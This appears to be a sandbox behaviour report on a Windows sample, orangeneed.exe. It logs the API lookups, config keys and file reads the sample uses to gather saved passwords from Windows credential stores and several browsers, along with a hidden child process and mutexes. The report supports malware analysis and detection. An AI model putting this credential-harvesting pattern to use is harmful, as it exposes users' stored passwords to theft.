Get Handle	c:\program files (x86)\mozilla firefox\nss3.dll	base_address = 0x73f70000	2	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75730000	2	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe, size = 260	2	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\windows\system32\dwm.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\windows\explorer.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\windows\system32\taskhost.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files\microsoft office\root\office16\onenotem.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files (x86)\google\deputy elite historical.exe, file_name_orig = C:\Program Files (x86)\Google\deputy elite historical.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files (x86)\windows media player\sttrianglereasoning.exe, file_name_orig = C:\Program Files (x86)\Windows Media Player\sttrianglereasoning.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files (x86)\adobe\cleaner.exe, file_name_orig = C:\Program Files (x86)\Adobe\cleaner.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files (x86)\mozilla maintenance service\cookie-perspective-pl.exe, file_name_orig = C:\Program Files (x86)\Mozilla Maintenance Service\cookie-perspective-pl.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files\common files\monitor obesity medicine.exe, file_name_orig = C:\Program Files\Common Files\monitor obesity medicine.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files (x86)\windows portable devices\would cooling order.exe, file_name_orig = C:\Program Files (x86)\Windows Portable Devices\would cooling order.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files (x86)\microsoft onedrive\assume_morocco_miss.exe, file_name_orig = C:\Program Files (x86)\Microsoft OneDrive\assume_morocco_miss.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files (x86)\msbuild\tel-missions.exe, file_name_orig = C:\Program Files (x86)\MSBuild\tel-missions.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files\windows photo viewer\sponsors.exe, file_name_orig = C:\Program Files\Windows Photo Viewer\sponsors.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files (x86)\windows sidebar\developersworldsdisclaimers.exe, file_name_orig = C:\Program Files (x86)\Windows Sidebar\developersworldsdisclaimers.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files\windows nt\reach_depth_differently.exe, file_name_orig = C:\Program Files\Windows NT\reach_depth_differently.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files (x86)\adobe\amenities mumbai propecia.exe, file_name_orig = C:\Program Files (x86)\Adobe\amenities mumbai propecia.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files\msbuild\myanmarpublisher.exe, file_name_orig = C:\Program Files\MSBuild\myanmarpublisher.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files\common files\considerationlabels.exe, file_name_orig = C:\Program Files\Common Files\considerationlabels.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files\windows sidebar\notre.exe, file_name_orig = C:\Program Files\Windows Sidebar\notre.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files (x86)\windows nt\picks.exe, file_name_orig = C:\Program Files (x86)\Windows NT\picks.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files\windows media player\competitions-bangladesh.exe, file_name_orig = C:\Program Files\Windows Media Player\competitions-bangladesh.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files\microsoft office\root\office16\winword.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\windows\system32\taskeng.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files\microsoft office\root\office16\msoia.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe, size = 260	1	Fn
Get Filename	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe, size = 260	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = InitCommonControlsEx, address_out = 0x743f09ce	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderPathW, address_out = 0x76130468	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextA, address_out = 0x759d91dd	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x759de124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x759ddf4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x759ddf7e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x759ddf36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x759ddf66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CredReadA, address_out = 0x75a171c1	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CredFree, address_out = 0x759db2ec	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CredDeleteA, address_out = 0x75a17941	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CredEnumerateA, address_out = 0x75a17381	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CredEnumerateW, address_out = 0x75a17481	1	Fn
Get Address	c:\windows\syswow64\pstorec.dll	function = PStoreCreateInstance, address_out = 0x7413526c	1	Fn
Get Address	c:\windows\syswow64\pstorec.dll	function = VaultOpenVault, address_out = 0x741326a9	1	Fn
Get Address	c:\windows\syswow64\pstorec.dll	function = VaultCloseVault, address_out = 0x74132718	1	Fn
Get Address	c:\windows\syswow64\pstorec.dll	function = VaultEnumerateItems, address_out = 0x74133099	1	Fn
Get Address	c:\windows\syswow64\pstorec.dll	function = VaultFree, address_out = 0x74134321	1	Fn
Get Address	c:\windows\syswow64\pstorec.dll	function = VaultGetInformation, address_out = 0x741324c0	1	Fn
Get Address	c:\windows\syswow64\pstorec.dll	function = VaultGetItem, address_out = 0x74133242	2	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = NSS_Init, address_out = 0x7402d70b	2	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = NSS_Shutdown, address_out = 0x7402d13c	2	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = PK11_GetInternalKeySlot, address_out = 0x73fc3c51	2	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = PK11_FreeSlot, address_out = 0x73fc3333	2	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = PK11_CheckUserPassword, address_out = 0x73facbc4	2	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = PK11_Authenticate, address_out = 0x73fad3ca	2	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = PK11SDR_Decrypt, address_out = 0x73fc00a7	2	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = sqlite3_open, address_out = 0x740d1ca0	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = sqlite3_prepare, address_out = 0x7405ce70	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = sqlite3_step, address_out = 0x740c5200	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = sqlite3_column_text, address_out = 0x7407d400	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = sqlite3_column_int, address_out = 0x7407d3a0	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = sqlite3_column_int64, address_out = 0x7407d3d0	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = sqlite3_finalize, address_out = 0x740a9f60	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = sqlite3_close, address_out = 0x740abde0	1	Fn
Get Address	c:\program files (x86)\mozilla firefox\nss3.dll	function = sqlite3_exec, address_out = 0x740aa270	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleBaseNameW, address_out = 0x758a152c	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcessModules, address_out = 0x758a1408	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleFileNameExW, address_out = 0x758a13f0	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcesses, address_out = 0x758a1544	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleInformation, address_out = 0x758a1420	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryFullProcessImageNameW, address_out = 0x757515f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessTimes, address_out = 0x7575d60f	1	Fn

System (2)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = Operating System		1	Fn
Get Info	type = Hardware Information		1	Fn

Ini (28)

Operation	Filename	Additional Information	Count	Logfile
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = ShowGridLines, default_value = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = SaveFilterIndex, default_value = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = ShowInfoTip, default_value = 1	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = MarkOddEvenRows, default_value = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = ShowTimeInGMT, default_value = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = LoadPasswordsIE, default_value = 1	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = LoadPasswordsFirefox, default_value = 1	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = LoadPasswordsChrome, default_value = 1	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = LoadPasswordsOpera, default_value = 1	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = LoadPasswordsSafari, default_value = 1	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = LoadPasswordsYandex, default_value = 1	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = UseChromeProfileFolder, default_value = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = UseOperaPasswordFile, default_value = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = FirefoxProfileFolder	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = FirefoxInstallFolder	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = ChromeProfileFolder	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = OperaPasswordFile	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = SaveFileEncoeding, default_value = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = WinPos	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = Columns	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.cfg	section_name = General, key_name = Sort, default_value = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini	section_name = Profile0, key_name = Path, data_out = Profiles/3y2joh8o.default	1	Fn
Read	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini	section_name = Profile0, key_name = IsRelative, default_value = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini	section_name = Profile1, key_name = Path	1	Fn
Read	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini	section_name = Profile1, key_name = IsRelative, default_value = 0	1	Fn

Process #11: orangeneed.exe

266

Information	Value
ID	#11
File Name	c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe
Command Line	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:04:25, Reason: Autostart
Unmonitor	End Time: 00:04:42, Reason: Self Terminated
Monitor Duration	00:00:17

OS Process Information

Information	Value
PID	0x548
Parent PID	0x470 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 54C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	r	-
locale.nls	0x001b0000	0x00216fff	Memory Mapped File	r	-
pagefile_0x0000000000220000	0x00220000	0x00226fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	rw	-
msvfw32.dll.mui	0x00240000	0x00241fff	Memory Mapped File	rw	-
pagefile_0x0000000000250000	0x00250000	0x00251fff	Pagefile Backed Memory	r	-
private_0x0000000000260000	0x00260000	0x0026ffff	Private Memory	rw	-
private_0x0000000000270000	0x00270000	0x0032ffff	Private Memory	rw	-
private_0x0000000000330000	0x00330000	0x00345fff	Private Memory	rw	-
private_0x0000000000350000	0x00350000	0x00366fff	Private Memory	rwx	-
private_0x0000000000370000	0x00370000	0x003effff	Private Memory	rw	-
private_0x00000000003f0000	0x003f0000	0x003fffff	Private Memory	rwx	-
orangeneed.exe	0x00400000	0x0045dfff	Memory Mapped File	rwx	... Region Actions Download Dump
pagefile_0x0000000000460000	0x00460000	0x005e7fff	Pagefile Backed Memory	r	-
private_0x00000000005f0000	0x005f0000	0x00606fff	Private Memory	rw	-
private_0x0000000000610000	0x00610000	0x0061ffff	Private Memory	rw	-
pagefile_0x0000000000610000	0x00610000	0x00614fff	Pagefile Backed Memory	rw	-
private_0x0000000000620000	0x00620000	0x0071ffff	Private Memory	rw	-
pagefile_0x0000000000720000	0x00720000	0x008a0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000008b0000	0x008b0000	0x01caffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001cb0000	0x01cb0000	0x020a2fff	Pagefile Backed Memory	r	-
pagefile_0x00000000020b0000	0x020b0000	0x020b4fff	Pagefile Backed Memory	rw	-
private_0x0000000002120000	0x02120000	0x0212ffff	Private Memory	rw	-
sortdefault.nls	0x02130000	0x023fefff	Memory Mapped File	r	-
ntdsapi.dll	0x73770000	0x73787fff	Memory Mapped File	rwx	-
dwmapi.dll	0x73790000	0x737a2fff	Memory Mapped File	rwx	-
esent.dll	0x73830000	0x739d2fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x73b80000	0x73b87fff	Memory Mapped File	rwx	-
wow64win.dll	0x73b90000	0x73bebfff	Memory Mapped File	rwx	-
wow64.dll	0x73bf0000	0x73c2efff	Memory Mapped File	rwx	-
rasman.dll	0x74a60000	0x74a74fff	Memory Mapped File	rwx	-
rasapi32.dll	0x74a90000	0x74ae1fff	Memory Mapped File	rwx	-
winspool.drv	0x74af0000	0x74b40fff	Memory Mapped File	rwx	-
comctl32.dll	0x74b50000	0x74cedfff	Memory Mapped File	rwx	-
msvfw32.dll	0x74cf0000	0x74d10fff	Memory Mapped File	rwx	-
dciman32.dll	0x74d20000	0x74d25fff	Memory Mapped File	rwx	-
ddraw.dll	0x74d30000	0x74e16fff	Memory Mapped File	rwx	-
glu32.dll	0x74e20000	0x74e41fff	Memory Mapped File	rwx	-
opengl32.dll	0x74e50000	0x74f17fff	Memory Mapped File	rwx	-
secur32.dll	0x74f20000	0x74f27fff	Memory Mapped File	rwx	-
winmm.dll	0x74f30000	0x74f61fff	Memory Mapped File	rwx	-
msacm32.dll	0x74f70000	0x74f83fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fa0000	0x74fabfff	Memory Mapped File	rwx	-
sspicli.dll	0x74fb0000	0x7500ffff	Memory Mapped File	rwx	-
urlmon.dll	0x75010000	0x75145fff	Memory Mapped File	rwx	-
msctf.dll	0x751e0000	0x752abfff	Memory Mapped File	rwx	-
gdi32.dll	0x752b0000	0x7533ffff	Memory Mapped File	rwx	-
msasn1.dll	0x75340000	0x7534bfff	Memory Mapped File	rwx	-
wintrust.dll	0x753e0000	0x7540cfff	Memory Mapped File	rwx	-
kernelbase.dll	0x754a0000	0x754e5fff	Memory Mapped File	rwx	-
kernel32.dll	0x754f0000	0x755fffff	Memory Mapped File	rwx	-
advapi32.dll	0x75600000	0x7569ffff	Memory Mapped File	rwx	-
msvcrt.dll	0x75720000	0x757cbfff	Memory Mapped File	rwx	-
ole32.dll	0x757d0000	0x7592bfff	Memory Mapped File	rwx	-
iertutil.dll	0x75930000	0x75b2afff	Memory Mapped File	rwx	-
setupapi.dll	0x75b30000	0x75cccfff	Memory Mapped File	rwx	-
crypt32.dll	0x75cd0000	0x75decfff	Memory Mapped File	rwx	-
ws2_32.dll	0x75df0000	0x75e24fff	Memory Mapped File	rwx	-
nsi.dll	0x75e30000	0x75e35fff	Memory Mapped File	rwx	-
user32.dll	0x75e40000	0x75f3ffff	Memory Mapped File	rwx	-
imm32.dll	0x75f40000	0x75f9ffff	Memory Mapped File	rwx	-
sechost.dll	0x75fa0000	0x75fb8fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x75fc0000	0x760affff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x760b0000	0x760d6fff	Memory Mapped File	rwx	-
psapi.dll	0x760e0000	0x760e4fff	Memory Mapped File	rwx	-
shlwapi.dll	0x76140000	0x76196fff	Memory Mapped File	rwx	-
devobj.dll	0x761a0000	0x761b1fff	Memory Mapped File	rwx	-
wininet.dll	0x761d0000	0x762c4fff	Memory Mapped File	rwx	-
shell32.dll	0x762d0000	0x76f19fff	Memory Mapped File	rwx	-
usp10.dll	0x76f20000	0x76fbcfff	Memory Mapped File	rwx	-
oleaut32.dll	0x76fc0000	0x7704efff	Memory Mapped File	rwx	-
private_0x0000000077050000	0x77050000	0x7716efff	Private Memory	rwx	-
private_0x0000000077170000	0x77170000	0x77269fff	Private Memory	rwx	-
ntdll.dll	0x77270000	0x77418fff	Memory Mapped File	rwx	-
lpk.dll	0x77420000	0x77429fff	Memory Mapped File	rwx	-
ntdll.dll	0x77450000	0x775cffff	Memory Mapped File	rwx	-
private_0x000000007ef50000	0x7ef50000	0x7efaffff	Private Memory	rw	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Host Behavior

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe	os_pid = 0x5e0, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE		1	Fn

Module (263)

Operation	Module	Additional Information	Count	Logfile
Load	USER32.dll	base_address = 0x75e40000	1	Fn
Load	KERNEL32.dll	base_address = 0x754f0000	1	Fn
Get Handle	c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe	base_address = 0x400000	1	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe, size = 260	1	Fn
Get Address	-	function = VirtualAlloc, ordinal = 0, address_out = 0x18f8ec	249	Fn
Get Address	-	function = LoadLibraryA, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = GetProcAddress, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = VirtualAlloc, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = VirtualProtect, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = wsprintfA, address_out = 0x75e6ae5f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeConsole, address_out = 0x755a6aa8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpA, address_out = 0x7551eceb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x755011c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x755011a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75501809	1	Fn

Mutex (2)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = PEM470		1	Fn
Create	mutex_name = PEM548		1	Fn

Process #12: orangeneed.exe

316

Information	Value
ID	#12
File Name	c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe
Command Line	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:04:40, Reason: Child Process
Unmonitor	End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration	00:00:28

OS Process Information

Information	Value
PID	0x5e0
Parent PID	0x548 (c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 5A4 0x 518 0x 564 0x 530 0x 618 0x 374 0x 614 0x 604

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001b0000	0x001b0000	0x001b6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001c0000	0x001c0000	0x001c1fff	Pagefile Backed Memory	rw	-
msvfw32.dll.mui	0x001d0000	0x001d1fff	Memory Mapped File	rw	-
pagefile_0x00000000001e0000	0x001e0000	0x001e1fff	Pagefile Backed Memory	r	-
private_0x00000000001f0000	0x001f0000	0x0026ffff	Private Memory	rw	-
private_0x0000000000270000	0x00270000	0x00285fff	Private Memory	rw	-
private_0x0000000000290000	0x00290000	0x002a6fff	Private Memory	rwx	-
private_0x00000000002b0000	0x002b0000	0x003affff	Private Memory	rw	-
private_0x00000000003b0000	0x003b0000	0x003c6fff	Private Memory	rw	-
private_0x00000000003d0000	0x003d0000	0x003dffff	Private Memory	rwx	-
private_0x00000000003e0000	0x003e0000	0x003effff	Private Memory	rw	-
pagefile_0x00000000003e0000	0x003e0000	0x003e4fff	Pagefile Backed Memory	rw	-
pagefile_0x00000000003e0000	0x003e0000	0x003e0fff	Pagefile Backed Memory	rw	-
pagefile_0x00000000003f0000	0x003f0000	0x003f4fff	Pagefile Backed Memory	rw	-
private_0x00000000003f0000	0x003f0000	0x003fffff	Private Memory	rw	-
pagefile_0x00000000003f0000	0x003f0000	0x003f1fff	Pagefile Backed Memory	r	-
orangeneed.exe	0x00400000	0x0045dfff	Memory Mapped File	rwx	... Region Actions Download Dump
locale.nls	0x00460000	0x004c6fff	Memory Mapped File	r	-
private_0x00000000004d0000	0x004d0000	0x0050ffff	Private Memory	rw	-
orangeneed.exe	0x00510000	0x0056bfff	Memory Mapped File	r	-
rsaenh.dll	0x00510000	0x0054bfff	Memory Mapped File	r	-
pagefile_0x0000000000510000	0x00510000	0x00514fff	Pagefile Backed Memory	rw	-
index.dat	0x00510000	0x0051bfff	Memory Mapped File	rw	... Region Actions Download Dump
index.dat	0x00520000	0x00527fff	Memory Mapped File	rw	... Region Actions Download Dump
index.dat	0x00530000	0x0053ffff	Memory Mapped File	rw	... Region Actions Download Dump
index.dat	0x00530000	0x0053ffff	Memory Mapped File	rw	... Region Actions Download Dump
private_0x0000000000540000	0x00540000	0x00540fff	Private Memory	rw	-
pagefile_0x0000000000540000	0x00540000	0x00540fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000550000	0x00550000	0x00550fff	Pagefile Backed Memory	r	-
private_0x0000000000570000	0x00570000	0x0057ffff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x0058ffff	Private Memory	rw	-
private_0x0000000000590000	0x00590000	0x0064ffff	Private Memory	rw	-
pagefile_0x0000000000650000	0x00650000	0x007d7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000007e0000	0x007e0000	0x00960fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000970000	0x00970000	0x01d6ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001d70000	0x01d70000	0x02162fff	Pagefile Backed Memory	r	-
sortdefault.nls	0x02170000	0x0243efff	Memory Mapped File	r	-
private_0x0000000002440000	0x02440000	0x0260ffff	Private Memory	rw	-
